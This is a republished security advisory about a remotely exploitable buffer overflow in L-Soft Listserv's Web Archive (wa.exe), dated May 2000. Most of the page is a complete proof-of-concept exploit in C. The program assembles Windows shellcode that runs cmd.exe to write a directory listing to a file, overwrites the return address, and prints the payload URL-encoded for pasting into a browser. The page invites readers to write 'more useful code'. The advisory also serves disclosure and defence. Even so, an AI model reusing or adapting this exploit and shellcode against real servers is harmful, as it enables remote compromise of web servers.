Listserv Web Archives Buffer Overflow

 
Listserv Web Archives Buffer Overflow
Reported May 03,  2000 by
Cerberus Information Security
VERSIONS EFFECTED
  • LISTSERV"S "WA" utility, version 1.8d and earlier

DESCRIPTION

The Cerberus Security Team has discovered a remotely exploitable buffer overflow in Lsoft"s Listserv Web Archive component (wa.exe).  Listserv is one of the more popular software packages used for providing mailing lists.  The Web Archive component allows mailing list operators to provide an archive of all messages sent to the mailing list via a web interface.  Both UNIX and Windows versions of the software are vulnerable.

In a lengthy advisory posted to Win2K Security AdviceDavid Litchfield of Cerberus explains that by making a special formed request to the Web Archives it is possible to overflow a buffer allowing arbitrary code to executed, compromising the web server.

View the Cerberus Advisory in its entirety here.

 
DEMONSTRATION

Complete demonstration code was made available by Cerberus Security

The sample code here is "proof of concept" only and will simply create a file called "cerberus.txt". More useful code is left as excercise of the imagination of the reader.

/////////////////////////////////////////////////////////////////
//
//
// LSOFT"s Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield ([email protected])
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////

#include
int main()
\{
unsigned char exploit\[2000\]="";
int count = 0;

while(count <100)
\{
exploit\[count\]=0x90;
count ++;
\}

// push ebp
exploit\[count\]=0x55;
count ++;

// mov ebp,esp
exploit\[count\]=0x8B;
count ++;
exploit\[count\]=0xEC;
count ++;

// mov eax, 0x77f1a986
exploit\[count\]=0xb8;
count ++;
exploit\[count\]=0x86;
count ++;
exploit\[count\]=0xa9;
count ++;
exploit\[count\]=0xf1;
count ++;
exploit\[count\]=0x77;
count ++;

// mov ebx, 0xffffffff
exploit\[count\]=0xbb;
count ++;
exploit\[count\]=0xff;
count ++;
exploit\[count\]=0xff;
count ++;
exploit\[count\]=0xff;
count ++;
exploit\[count\]=0xff;
count ++;

file://sub ebx, 0xffffff8B
exploit\[count\]=0x83;
count ++;
exploit\[count\]=0xeb;
count ++;
exploit\[count\]=0x8B;
count ++;

// push ebx
exploit\[count\]=0x53;
count ++;

// push "xt.s"
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x73;
count ++;
exploit\[count\]=0x2e;
count ++;
exploit\[count\]=0x74;
count ++;
exploit\[count\]=0x78;
count ++;

file://push "ureb"
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x62;
count ++;
exploit\[count\]=0x65;
count ++;
exploit\[count\]=0x72;
count ++;
exploit\[count\]=0x75;
count ++;

file://push "rec "
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x20;
count ++;
exploit\[count\]=0x63;
count ++;
exploit\[count\]=0x65;
count ++;
exploit\[count\]=0x72;
count ++;

file://push "> ri"
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x69;
count ++;
exploit\[count\]=0x72;
count ++;
exploit\[count\]=0x20;
count ++;
exploit\[count\]=0x3e;
count ++;

file://push "d c/"
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x2f;
count ++;
exploit\[count\]=0x63;
count ++;
exploit\[count\]=0x20;
count ++;
exploit\[count\]=0x64;
count ++;

file://push " exe"
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x65;
count ++;
exploit\[count\]=0x78;
count ++;
exploit\[count\]=0x65;
count ++;
exploit\[count\]=0x20;
count ++;


file://push "cmd."
exploit\[count\]=0x68;
count ++;
exploit\[count\]=0x63;
count ++;
exploit\[count\]=0x6d;
count ++;
exploit\[count\]=0x64;
count ++;
exploit\[count\]=0x2e;
count ++;

file://mov ebx, esp
exploit\[count\]=0x8b;
count ++;
exploit\[count\]=0xdc;
count ++;

file://xor esi, esi
exploit\[count\]=0x33;
count ++;
exploit\[count\]=0xf6;
count ++;

file://push esi
exploit\[count\]=0x56;
count ++;

file://push ebx
exploit\[count\]=0x53;
count ++;

file://call eax
exploit\[count\]=0xff;
count ++;
exploit\[count\]=0xd0;
count ++;

// set a break point (int 3)
while(count <420)
\{
exploit\[count\]=0xCC;
count ++;
\}


// overwrite the return address

exploit\[count\]=0x36;
count ++;
exploit\[count\]=0x28;
count ++;
exploit\[count\]=0xf3;
count ++;
exploit\[count\]=0x77;
count ++;

// put in 40 nops (0x90)

while (count < 464)
\{
exploit\[count\]=0x90;
count ++;
\}

// write our code that"ll get us back into our un-tolower()ed string

// move edx, 0xFFFFFFFF
exploit\[count\]=0xBA;
count ++;
exploit\[count\]=0xFF;
count ++;
exploit\[count\]=0xFF;
count ++;
exploit\[count\]=0xFF;
count ++;
exploit\[count\]=0xFF;
count ++;

// sub edx, 0xFFDFAC87
exploit\[count\]=0x81;
count ++;
exploit\[count\]=0xEA;
count ++;
exploit\[count\]=0x87;
count ++;
exploit\[count\]=0xAC;
count ++;
exploit\[count\]=0xDF;
count ++;
exploit\[count\]=0xFF;
count ++;

// jmp edx
exploit\[count\]=0xFF;
count ++;
exploit\[count\]=0xE2;
count ++;

// set readable part in memory to stop first AV

exploit\[390\]=0x36;
exploit\[390\]=0xf3;
exploit\[391\]=0x77;

count = 0;
while(count < 477)
\{
  printf("%%%x",exploit\[count\]);
  count ++;
\}

return 0;
\}


VENDOR  RESPONSE 

LSoft was made aware of this problem on April 28, 2000 and has informed us that a patch is forthcoming.  Lsoft asks that all customers follow proper customer support procedures to address this issue.

CREDITS
Discovered and reported by
Cerberus Information Security

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish